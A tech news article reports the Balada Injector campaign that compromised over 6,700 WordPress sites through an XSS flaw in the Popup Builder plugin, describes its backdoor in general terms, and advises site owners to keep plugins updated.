Over 6,700 WordPress websites fell victim to a sophisticated cyber campaign deploying the notorious Balada Injector malware.
Initially brought to light by Dr. Web researchers, this concerted attack commenced in mid-December, targeting vulnerabilities in WordPress themes and add-ons.
Shockingly, it was unveiled that Balada Injector had been executing a colossal operation since 2017, compromising over 17,000 WordPress sites.
WordPress Backdoor
A malicious version of the Popup Builder plugin is seen to be associated with the new Balada Injector, affecting more than 6,700 WordPress websites.
According to a report by Bleeping Computer, the attackers strategically implant a backdoor into compromised sites, redirecting visitors to fraudulent support pages, lottery schemes, and push notification scams.
Related Article: 1.5 Million WordPress Sites at Risk as Hackers Try to Exploit Cookie Consent Plugin
Recent Surge in Attacks
The latest campaign emerged on December 13, 2023, just days after the disclosure of CVE-2023-6000-a cross-site scripting (XSS) vulnerability affecting Popup Builder versions 4.2.3 and older.
Popup Builder, employed on 200,000 sites for crafting custom popups, became the focal point for exploitation.
Sucuri, a leading website security company, identified the rapid integration of an exploit for the reported flaw by Balada Injector.
According to cybersecurity researchers, the attackers ingeniously manipulated the "sgpbWillOpen" event in Popup Builder, executing malicious JavaScript code within the site's database upon popup activation.
Beyond exploiting Popup Builder, the threat actors resorted to a secondary infection method. They tampered with the wp-blog-header.php file, injecting the same JavaScript backdoor into the compromised sites.
Stealthy Backdoor Operations
The "felody" backdoor, a key component of the Balada Injector arsenal, possesses formidable capabilities. From arbitrary PHP code execution to file uploading and communication with attackers, its functionality extends to fetching additional payloads.
As of now, the Balada Injector campaign has ensnared 6,700 websites. An analysis of attack domains by Sucuri hints at a deliberate effort to obfuscate the attackers' origins, involving the use of Cloudflare firewalls.
Defending against Balada Injector mandates immediate actions from WordPress site administrators. Updating themes and plugins to the latest versions, uninstalling redundant or unsupported products, and minimizing active plugins on the site all contribute to fortifying the defenses against automated breaches.
You don't want to experience catching malware on your WordPress site so the best thing you can do is to regularly update your plugins.
What happened in 2022 is enough for every WordPress user to secure their websites. At that time, millions of sensitive information were leaked. The vulnerability was discovered in a cloning WordPress plugin UpdraftPlus.
The experts blamed the implementation of UpdraftPlus as poor and easy to access. This is the reason why the flaw quickly spread, putting millions of WordPress users at a big risk.
Again, there's no harm in updating your WP plugins. It might take you some minutes but you can have peace of mind that your website is secure and safe from unwanted attacks from outsiders and threat actors.
For more news and updates about WordPress and the like, just click here.
Read Also: WordPress 'WooCommerce Payments' Plugin Critical Vulnerability Spotted: Here's What You Need to Know
